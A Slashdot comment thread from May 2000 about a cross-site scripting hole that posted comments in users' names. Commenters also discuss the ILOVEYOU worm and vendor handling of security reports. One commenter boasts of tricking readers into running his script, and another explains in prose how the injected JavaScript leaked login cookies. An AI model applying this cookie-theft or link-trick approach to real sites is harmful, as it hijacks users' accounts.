    You have to set an option to keep Outlook from automatically running .vbs files I believe. I don't think, for security's sake, that should even be an option.

    carlos

  • by RayChuang ( 10181 ) on Thursday May 11, 2000 @01:25PM (#1078156)
    If the folks at Peacefire did not reported these problems to Microsoft's Security team, then they are essentially doing a major disservice to the public.

    Hopefully, they do know Microsoft's address for reporting security issues: secure@microsoft.com. That address is monitored 24 hours a day and the MS security folks will try to replicate the problem ASAP.
  • Fun with Amazon's One-Click Shopping, or "you mean you didn't order five hundred copies of Joy of Preteen Sex?"

    Doesn't Amazon's proprietary exclusive patented HANDS OFF IT'S OURS AND YOU CAN'T HAVE IT One-Click Shopping system use cookies to save buyers those arduous extra clicks? And doesn't this mean that someone using this exploit can then get your personal buyer's information? ("Your," not "my", at least until Amazon stops suing people right and left.)

    Gee, I guess it's a good thing that Amazon has defended their patent so vigorously, or else customers of other companies would be equally at risk.

    By the way, this is off-topic, but I figure readers would be amused. Who is to blame for the "ILOVEYOU" worm? Those funloving Filipino folks who wrote it? Microsoft, for making their scripting language so insecure and so easy to subvert? Why no. According to those geniuses [nytimes.com] in Congress, the $15-billion dollars in damages (I wonder why they didn't say "$15-trillion" or $15-quadrillion" as long as they were pulling numbers out of thin air) are due to the slackness and irresponsibility of McAfee, the anti-virus vendor. I've got to be kidding, right? Well, check it out [nytimes.com].

    Yours WDK - WKiernan@concentric.net

  • Of course, you can place the orders using you Amazon Affilate Sote, giving yourself a small percentage. But I think that would make it a tad too obvious as to who the culprit was. Unless it was your friend's store. :)
  • I have no idea what they did. I know that _I_ reported a very similar issue (possibly due to the same root problem) with the exact same consequences to Microsoft two months ago and they have not yet released a fix.

    Sure, I got a quick response saying they were looking into it. Sure, they said they had developed a patch. But releasing it? Well... that didn't quite happen. It is true that I did not pressure them on it since I was busy with more important things, but I shouldn't have to.
  • Hot damn...gotta like being one of the Anonymous Cowards in that sid. Is anyone else concerned by the sheer number of people that went ahead and clicked it? Aren't you people the ones that are always crowing about how much smarter you are than the average "luser"? Everyone just believed that all that script would do is post a comment, just like a bunch of idiots believed that someone at Dow Jones sent them love letters.

    All it did was post a comment. Theres a link to the source at sid=numb. It could have done worse though if I had added the javascript thing (provided you use Windows and IE.) As for clicking links no one is safe (unless they have redirection disabled.) I could e-mail a similar link and have it look completely benign, yet have it post something incredibly embarrassing.

    BTW, to find out more about it click here. [kuro5hin.org]

    or just go to http://www.kuro5hin.org/?op=displaystory&sid=2000/ 5/9/183550/1910 if you don't trust the link :)

    One other thing, I used a PHP script because Slashdot's software recognizes duplicate posts and I needed to make the content dynamic. However, for a targeted attack plain old HTML on a geocities web page would do the trick.

    numb

    numb
  • by pod ( 1103 ) on Thursday May 11, 2000 @12:00PM (#1078165) Homepage
    Ahh, this looks to be a slashdot specific exploit. It makes slashdot put your loginid and password in the url, and redirects back to the script thus transmitting the referrer.

    It's actually en exploit discussed on CERT [cert.org] where a malicious web site can embed some script in a link to a cgi script, which in turn pastes it into the resulting page unaltered and the victim's browser executes it.

    In this case the script is a bit of javascript that outputs your slashdot cookie via search.pl. All javascript enabled browsers are affected by this.

    It's just a result of sloppy coding.

  • Turning off Javascript or disabling stored cookies is an acceptable temporary solution to the problem.

    If a security hole is found that can't be worked around, then yes, wait for a patch. Same thing you would do with Netscape.

    Both Netscape and Microsoft IE have had security problems but Slashdot holds Microsoft to a different standard.

    Witness an OLD OLD bug:

    http://www.ciac.org/ciac/bulletins/i -040.shtml [ciac.org]

    Sounds familiar, doesn't it? What happened? It got fixed. And this certainly is not the only Netscape bug that has ever surfaced.

    Security problems are going to be discovered. Humans make mistakes. The key is to respond to the problems swiftly, and try not to rush products out the door without proper testing. I think both MS and Netscape were guilty of the latter for a long time.

    Best regards,

    SEAL

  • I can tell you for a fact that you had to open the attachment through Windows Scripting Host for it to do ANYTHING!

    Good for you. May I politely point out that scripting host is enabled by default - how is a clueless user going to know to turn it off? Second, I did hear that if you have the preview window open the script will execute without any further help from the user. Ugly. Caveat: I don't normally run Windows, so I didn't check this.
    --
  • > WARNING: Clicking this link will cause an article to be posted on Slashdot in your name

    Think how mad someone would be if all those 300+ posts (so far) had been copies of a certain "trade secret" that has been mentioned here lately.

    --

Just go with the flow control, roll with the crunches, and, when you get a prompt, type like hell.

Working...